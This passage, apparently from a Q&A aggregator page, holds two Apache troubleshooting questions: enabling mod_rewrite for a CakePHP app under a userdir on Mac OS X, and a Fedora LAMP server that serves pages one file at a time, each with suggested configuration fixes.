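        1,000,000 writes / 86,400 seconds     ≈ 12 writes/second on average
        peak traffic at 5-10x the average     → roughly 60-120 writes/second

    So a provisioned 50 writes/second would comfortably cover the average for that load but could throttle at peak hours; reads usually need a larger budget still, since rendering an inbox reads many messages per visit.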

    Read the article

  • Enabling `mod_rewrite` apache, permissions issues

    - by rudolph9
    I am attempting to enable mod_rewrite on the Apache2 web server installed with Mac OS X 10.7.4, following instructions online, ultimately to host CakePHP applications. I run into permissions issues accessing the site via a web browser when I change the directory block associated with the CakePHP site in /etc/apache2/users/username.conf from:

        <Directory "/Users/username/Sites/">
            Options Indexes FollowSymLinks MultiViews
            AllowOverride none
            Order allow,deny
            Allow from all
        </Directory>

    to:

        <Directory "/Users/username/Sites/">
            Options Indexes MultiViews
            AllowOverride none
            Order allow,deny
            Allow from all
        </Directory>
        <Directory "/Users/username/Sites/cakephp_app/">
            Options Indexes FollowSymLinks MultiViews
            AllowOverride all
            Order allow,deny
            Allow from all
        </Directory>

    The .htaccess files are the CakePHP 2.2.2 defaults, as follows.

    /Users/username/Sites/cakephp_app/.htaccess:

        <IfModule mod_rewrite.c>
            RewriteEngine on
            RewriteRule ^$ app/webroot/ [L]
            RewriteRule (.*) app/webroot/$1 [L]
        </IfModule>

    /Users/username/Sites/cakephp_app/app/.htaccess:

        <IfModule mod_rewrite.c>
            RewriteEngine on
            RewriteRule ^$ webroot/ [L]
            RewriteRule (.*) webroot/$1 [L]
        </IfModule>

    /Users/username/Sites/cakephp_app/app/webroot/.htaccess:

        <IfModule mod_rewrite.c>
            RewriteEngine on
            RewriteCond %{REQUEST_FILENAME} !-d
            RewriteCond %{REQUEST_FILENAME} !-f
            RewriteRule ^(.*)$ index.php [QSA,L]
        </IfModule>

    When requesting http://0.0.0.0/~username/cakephp_app/index.php in a web browser, the response is:

        Not Found
        The requested URL /Users/username/Sites/cakephp_app/app/webroot/ was not found on this server.
        Apache/2.2.21 (Unix) DAV/2 PHP/5.3.10 with Suhosin-Patch Server at 0.0.0.0 Port 80

    Requests to http://0.0.0.0/~username/ and http://0.0.0.0/~username/cakephp_app/ add the following to /var/log/apache2/error_log:

        [Tue Sep 04 22:53:26 2012] [error] [client 127.0.0.1] File does not exist: /Library/WebServer/Documents/Users, referer: http://0.0.0.0/~username/
        [Tue Sep 04 22:53:26 2012] [error] [client 127.0.0.1] File does not exist: /Library/WebServer/Documents/favicon.ico

    What is causing the issue? And is there a server program, ideally installable via Homebrew, that would make hosting CakePHP applications for testing purposes more effective and efficient?
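
    The "/app/webroot/ was not found" error is what CakePHP's stock rules produce when the app lives under a userdir prefix instead of the document root: the rewritten path loses the /~username/ part. The usual fix is adding a RewriteBase matching the URL prefix to each .htaccess; a minimal sketch for the outermost file (the value is an assumption and shifts per directory level):

        <IfModule mod_rewrite.c>
            RewriteEngine on
            # hypothetical base: the URL path this directory is served under
            RewriteBase /~username/cakephp_app/
            RewriteRule ^$ app/webroot/ [L]
            RewriteRule (.*) app/webroot/$1 [L]
        </IfModule>

    The /Library/WebServer/Documents/Users errors in the log point the same way: without a base, Apache resolves the rewritten path against the main document root rather than the per-user Sites folder.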

    Read the article

  • Only receiving one document at a time from new web server.

    - by Robert Kuykendall
    We're trying to move our internal ticketing system from a Microsoft Small Business Server in the server closet to a Rackspace Cloud Server. The install is a Fedora 11 LAMP stack and should be default out of the box, except for the vhosts appended to the bottom of httpd.conf. The new server is suffering from crippling load times, and watching the pages load in Firebug makes the problem easy to see, though I can't figure out the cause. Here is the old server (http://rkuykendall.com/uploads/old.server.png); I was expecting something like this, just a little slower, since it is no longer hosted locally. Instead, the new server (http://rkuykendall.com/uploads/new.server.png) appears to serve only one file at a time. Here is another example of this staircase load-time effect (http://rkuykendall.com/uploads/staircase.png), and another very clear example (http://rkuykendall.com/uploads/staircase2.png). I talked to some guys on Freenode #httpd with no luck. I created a duplicate server to play with, and also created a fresh server with Fedora Core 13 and moved over just the database and web files, with no luck. Any suggestions? (Image links disabled due to new-user spam restrictions.)
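
    A strictly serial waterfall like that usually points at connection handling rather than the application; these are the httpd.conf settings worth comparing against the old box (values below are illustrative defaults, not a prescription):

        # /etc/httpd/conf/httpd.conf
        KeepAlive On                 # allow several requests per TCP connection
        MaxKeepAliveRequests 100
        KeepAliveTimeout 5

        # prefork pool: too few spare children serializes concurrent clients
        <IfModule prefork.c>
            StartServers       8
            MinSpareServers    5
            MaxSpareServers   20
            MaxClients       150
        </IfModule>

    If MaxClients (or the server's memory) only allows a couple of children, each browser connection waits its turn, which produces exactly this staircase.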

    Read the article
